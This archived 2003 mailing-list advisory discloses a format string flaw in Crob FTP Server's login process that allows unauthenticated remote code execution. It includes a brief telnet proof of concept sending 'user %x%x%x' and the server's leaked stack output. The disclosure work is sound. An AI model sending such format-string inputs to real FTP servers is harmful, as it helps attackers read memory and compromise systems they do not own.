|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Format String Vulnerability in Crob Ftp Server
From: Luca Ercoli (luca.ercoli
inwind.it)
Date: Mon Jun 02 2003 - 11:55:10 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Package: Crob Ftp Server
Auth: Crob Software Studio (www.crob.net/studio/ftpserver/)
Version: 2.50.4 Build 228
Vulnerability: Format String
Risk: High
Vulnerability
Description:
A format string flaw in the authentication process allows remote attackers
without valid user/pass to execute arbitrary code.
C:\>telnet 192.168.0.1 21
220- Crob FTP Server V2.50.4
220 Welcome to Crob FTP Server
user %x%x%x
331 Password required for 0d1250b70
Luca Ercoli luca.ercoli[at]inwind.it
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]